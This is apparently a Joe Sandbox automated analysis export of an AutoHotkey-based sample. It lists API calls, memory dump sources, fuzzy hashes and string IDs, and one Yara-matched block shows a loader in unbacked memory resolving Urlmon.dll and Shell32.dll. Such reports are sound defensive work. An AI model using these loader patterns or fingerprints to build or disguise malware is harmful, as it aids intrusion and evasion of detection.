                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock__wcsicoll_vswprintf_s
                                      • String ID: %s\%s$ahk_default$v1j
                                      • API String ID: 2168002563-383174103
                                      • Opcode ID: 771a2ceb65daeb4ccfe632aa79a1d4b741da70bfd7ee2ef69d693ce1f936a359
                                      • Instruction ID: 1bd96417fd114b07a05b0c9843a93a474b6c2919aee6f4c6e01d8f9ec8e7b48c
                                      • Opcode Fuzzy Hash: 771a2ceb65daeb4ccfe632aa79a1d4b741da70bfd7ee2ef69d693ce1f936a359
                                      • Instruction Fuzzy Hash: 87911231901240CBDB24CF64DC94B6AB7A1AB89318F14272FE455873E1D778E881CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • _free.LIBCMT ref: 004316DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ClipboardCloseCountGlobalMessagePeekTickUnlock_free
                                      • String ID: Jumps cannot exit a FINALLY block.$v1j
                                      • API String ID: 3618655587-1623723626
                                      • Opcode ID: 0cf29cc3de1e8a8369243b8842714e750fc69a231f3109ef4fc94c13b0bb7e20
                                      • Instruction ID: 3c9fa57c14b40288f7ba373758355d400465fa60aefd10318e9f9a61d0133e04
                                      • Opcode Fuzzy Hash: 0cf29cc3de1e8a8369243b8842714e750fc69a231f3109ef4fc94c13b0bb7e20
                                      • Instruction Fuzzy Hash: BEE1DF71A05340CFDB24CF14D89476AB7E1AB8C314F185A6FE8858B3A1D779AC81CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      APIs
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B167
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B179
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B18B
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B19D
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B1AF
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B1C1
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • GetTickCount.KERNEL32 ref: 00430B94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                      • String ID: ERROR$UseErrorLevel$v1j
                                      • API String ID: 2063310290-790589029
                                      • Opcode ID: 5b5d3b5fd520e935eb1a03831ee7398925bf2b254f0d6b30c2d7a7a61c296efa
                                      • Instruction ID: 1c23e83de0c117d21b56a764eb93755c363dab47ebdd6569de202c22211348f6
                                      • Opcode Fuzzy Hash: 5b5d3b5fd520e935eb1a03831ee7398925bf2b254f0d6b30c2d7a7a61c296efa
                                      • Instruction Fuzzy Hash: 2C811431501240DBDB24CF64ECA5B6A77A1AB49318F14172FE8558B3E1C378E880CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      APIs
                                      • _malloc.LIBCMT ref: 0041E6D3
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • SetTimer.USER32(0002044A,0000000E,04EF6D80,00403EB0), ref: 0041E716
                                      • _free.LIBCMT ref: 0041E876
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AllocateHeapTimer_free_malloc
                                      • String ID: 6Dd$Auto-execute
                                      • API String ID: 92111083-2964622979
                                      • Opcode ID: 5e0751b59cbc549159088c6fc51c296ccd3178d320893de69906cb5eda0d67ec
                                      • Instruction ID: d486a3a8f4b7bb8aae1d05632f1aa42ca788c03b187c766bbc2568cac54553ae
                                      • Opcode Fuzzy Hash: 5e0751b59cbc549159088c6fc51c296ccd3178d320893de69906cb5eda0d67ec
                                      • Instruction Fuzzy Hash: 04517171602244DFD710EF69EC44B863BE5EB45304F04447BE9059F3A1D77A9890CB5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3559 4876655-48766c4 GetModuleHandleA LoadLibraryA
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0489EBBD,00000000,0489F18F,?,00000000,00000000), ref: 04876660
                                      • LoadLibraryA.KERNELBASE(Urlmon.dll,?,0489EBBD,00000000,0489F18F,?,00000000,00000000), ref: 0487668C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HandleLibraryLoadModule
                                      • String ID: Advapi32.dll$LoadLibraryA$Shell32.dll$Urlmon.dll$kernel32.dll$ntdll.dll$user32.dll
                                      • API String ID: 4133054770-1140356178
                                      • Opcode ID: 1fdbb4e138f6cd60da1ea982b705595acccd19097ba76bf0d2a41ee3043da791
                                      • Instruction ID: a8b5fe9f5d7154b3df09affc72747b99c058a2f5a5a73ab24934d310c8e46103
                                      • Opcode Fuzzy Hash: 1fdbb4e138f6cd60da1ea982b705595acccd19097ba76bf0d2a41ee3043da791
                                      • Instruction Fuzzy Hash: 78F0FFB0D50B10AFBB005F6094999263FE0FB086153404D65E611DA718E7B8A8A5DF53
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00434D7D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
                                      • String ID: v1j
                                      • API String ID: 4107439908-3288809988
                                      • Opcode ID: fd23c9ca712ba4944c3425817a9188721248c35d1d7eccde78ecf171f2a8b04b
                                      • Instruction ID: b4eaf1b2afa2be916430221c66fee28cf9f2de17dabcaf2ed509ed2ee542ca81
                                      • Opcode Fuzzy Hash: fd23c9ca712ba4944c3425817a9188721248c35d1d7eccde78ecf171f2a8b04b
                                      • Instruction Fuzzy Hash: 0881E231505241DBDB24CF64ECA4B6ABBA1AB4D318F14672FE456873A1C778E880CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetTimer.USER32(0002044A,00000009,0000000A), ref: 004015C4
                                      • GetTickCount.KERNEL32 ref: 004015E9
                                      • GetMessageW.USER32(?,00000000,00000000,-00000311), ref: 00401630
                                      • GetTickCount.KERNEL32 ref: 0040163B
                                      • GetFocus.USER32 ref: 004016D4
                                        • Part of subcall function 00403620: joyGetPosEx.WINMM ref: 0040364F
                                      • TranslateAcceleratorW.USER32(00000000,?,?), ref: 0040171A
                                      • IsDialogMessageW.USER32(?,?), ref: 00401CC7
                                        • Part of subcall function 004741A0: SendMessageW.USER32(00000000,00001304,00000000,00000000), ref: 004741BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Message$CountTick$AcceleratorDialogFocusSendTimerTranslate
                                      • String ID: 6Dd$8&
                                      • API String ID: 3283625497-313529520
                                      • Opcode ID: 5245b7eac679e0a01c879c8293627842c19f5bbd6238c481323e15d34c75a816
                                      • Instruction ID: 162076b36842e91a3c5a0614aa55ad1b7b1d21a0011bb990f07feb905fbfb45b
                                      • Opcode Fuzzy Hash: 5245b7eac679e0a01c879c8293627842c19f5bbd6238c481323e15d34c75a816
                                      • Instruction Fuzzy Hash: F751A071A083409BDB219B28C88476F77E4AB96708F04093FF586A73F1D7799C81C75A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • GetTickCount.KERNEL32 ref: 00430B94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                      • String ID: v1j
                                      • API String ID: 1623861271-3288809988
                                      • Opcode ID: ec6d875b76f5743fe2b10a3431b8053dee00b045df26903fa1f060ed728629ac
                                      • Instruction ID: 132dffe664e024bb5c2583ca6da2a2e01c136fcff41b0dc87331aba71bd6e7c5
                                      • Opcode Fuzzy Hash: ec6d875b76f5743fe2b10a3431b8053dee00b045df26903fa1f060ed728629ac
                                      • Instruction Fuzzy Hash: 32E1CF31604341CFD724CF18D8A4B6AB7E1EB89314F145B6FE8498B3A1D779E881CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                      • String ID: v1j
                                      • API String ID: 1623861271-3288809988
                                      • Opcode ID: 8c8b7718764f34e54e0668513aaba27ce4404210dc5117919ee7535baa89316c
                                      • Instruction ID: 62f22c898de131cd45a934dd862476dbbfc6fb8e9f14a0bf904b656a1b10db3e
                                      • Opcode Fuzzy Hash: 8c8b7718764f34e54e0668513aaba27ce4404210dc5117919ee7535baa89316c
                                      • Instruction Fuzzy Hash: D771C431505241CBDB24CF64D8A476AB7E1EB4D318F24276FE4568B3E1D378A881CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _memset.LIBCMT ref: 0041D8DC
                                      • InitializeCriticalSection.KERNEL32(004D85F4,004DA728), ref: 0041D99D
                                      • OleInitialize.OLE32(00000000), ref: 0041D9A4
                                        • Part of subcall function 0041EB40: _wcsncpy.LIBCMT ref: 0041EB94
                                        • Part of subcall function 0041EB40: SetCurrentDirectoryW.KERNEL32(004B0CF8,00000000,004DA6A0,004DA6A0,00000000), ref: 0041EC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Initialize$CriticalCurrentDirectorySection_memset_wcsncpy
                                      • String ID: Clipboard$No tray mem$OU@$Tray
                                      • API String ID: 1348406673-106978176
                                      • Opcode ID: 857b7b82d80a3cff33b9350a7bfe815733e11f48f16bc4729da09dfe9775ca05
                                      • Instruction ID: 6afa78df98753c373e6af0059bf7c5f161b21597b71d9aec5a4e44b034e9a5f5
                                      • Opcode Fuzzy Hash: 857b7b82d80a3cff33b9350a7bfe815733e11f48f16bc4729da09dfe9775ca05
                                      • Instruction Fuzzy Hash: 2E81CDB2907380DAC310CF1AACA965ABBF4F749744B9686BFD05887361C7784454CF9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ErrorLast$AllocVirtual__itow
                                      • String ID: 0$DllCall
                                      • API String ID: 1132559366-1800201163
                                      • Opcode ID: 6526fdc36a5729697fe104dbb7a38d01a64fcdf3698366028a24c1643c9ea077
                                      • Instruction ID: 97e51f85f288f7df93021d39dfbe73acebd7c0b91efe73e9ad3ef109a337fe02
                                      • Opcode Fuzzy Hash: 6526fdc36a5729697fe104dbb7a38d01a64fcdf3698366028a24c1643c9ea077
                                      • Instruction Fuzzy Hash: CB6182B0E01208DFDF14CF98D885BAEBBB4FB08315F20426AE915A73A1D7785845CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • GetTickCount.KERNEL32 ref: 00430B94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                      • String ID: v1j
                                      • API String ID: 1623861271-3288809988
                                      • Opcode ID: 7d01cc2e55f2f2a5396af62285c3deaa0efd4267d2ab519a5fca75dcf6636b37
                                      • Instruction ID: 7a1efd68fd9881e8ab5ba3e2a02fedf52d28dbd9d965bd1842ddb91ef4da152f
                                      • Opcode Fuzzy Hash: 7d01cc2e55f2f2a5396af62285c3deaa0efd4267d2ab519a5fca75dcf6636b37
                                      • Instruction Fuzzy Hash: 3451D831505241CBDB24DF64ECA876A7BA1EB4D318F24276FE4558B3E1C378A881CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$ClipboardCloseGlobalUnlock
                                      • String ID: v1j
                                      • API String ID: 1740844442-3288809988
                                      • Opcode ID: 8ae004596be2c917d53da224fb9ab70e3914472bf9500bf870aa9d7be10f5720
                                      • Instruction ID: ae8bd58843cf7bf44b027188a16a8c9db86b53cea469b34f2be486d59955cc34
                                      • Opcode Fuzzy Hash: 8ae004596be2c917d53da224fb9ab70e3914472bf9500bf870aa9d7be10f5720
                                      • Instruction Fuzzy Hash: BE51E831505241CBDB24DF64ECA876A7BA1EB4D318F14276FE4558B3E1C378A880CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _free$CountTickTimer_malloc
                                      • String ID: Out of memory.
                                      • API String ID: 1890322348-4087320997
                                      • Opcode ID: 1a315e39e4fa2177a8afeb95969c62b4308369ff3a20e9d81c36d63ac81ddce6
                                      • Instruction ID: fe16b79cc7c962063084ee71072ee5d8b804547bf2e81d51d7a89d8302989c6c
                                      • Opcode Fuzzy Hash: 1a315e39e4fa2177a8afeb95969c62b4308369ff3a20e9d81c36d63ac81ddce6
                                      • Instruction Fuzzy Hash: A841A571A062019FDB109F29F8807AA7BE0E784315F19453BE885D3250EB79C95ACF9F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: @oM
                                      • API String ID: 4104443479-1708334743
                                      • Opcode ID: 8ca462ccea4f09e7ed3f6d0956d08def34de915acddaddbcb7be33b10c84c3b8
                                      • Instruction ID: 5e98bab9c166f0a202d8b0d6cba12ce3acfa1a9217b36d403b81750b656f27b2
                                      • Opcode Fuzzy Hash: 8ca462ccea4f09e7ed3f6d0956d08def34de915acddaddbcb7be33b10c84c3b8
                                      • Instruction Fuzzy Hash: 23C1AF70A00A14CBDF24CF55C885B6AB7B1AF45714F28819BE8059F395E778DC81CB9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00466490
                                      • GetTickCount.KERNEL32 ref: 004664C9
                                      • SetTimer.USER32(0002044A,0000000D,00002710,00446BB0), ref: 004664FF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTickTimer_free
                                      • String ID:
                                      • API String ID: 4185866143-0
                                      • Opcode ID: ad33ac57b72d59aa90bbd664afa06d08a268b1f225ad4fcf0a97781ee8a4a10b
                                      • Instruction ID: 35cb573fa4c1e07c2f644300afc3854e8720968d066ee5e8e85e5eb6887dc83f
                                      • Opcode Fuzzy Hash: ad33ac57b72d59aa90bbd664afa06d08a268b1f225ad4fcf0a97781ee8a4a10b
                                      • Instruction Fuzzy Hash: 10418F71509340DFD710DF15E894BAB7BE4AB84708F09856FE88597350EB38D985CB4B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00466490
                                      • GetTickCount.KERNEL32 ref: 004664C9
                                      • SetTimer.USER32(0002044A,0000000D,00002710,00446BB0), ref: 004664FF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTickTimer_free
                                      • String ID:
                                      • API String ID: 4185866143-0
                                      • Opcode ID: d9f95228d800ca3075c674674cdb42bdf37adbf6300ed46792d6929325df2ecc
                                      • Instruction ID: 01c7bb76e8e0bc40825685d81738a1852442c762348f7bbb3a74d180bf6c97d4
                                      • Opcode Fuzzy Hash: d9f95228d800ca3075c674674cdb42bdf37adbf6300ed46792d6929325df2ecc
                                      • Instruction Fuzzy Hash: E541ED70509240DFDB10DF24E880B9BBBE5AB95304F09892FE88587354E738D986CB5F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00466490
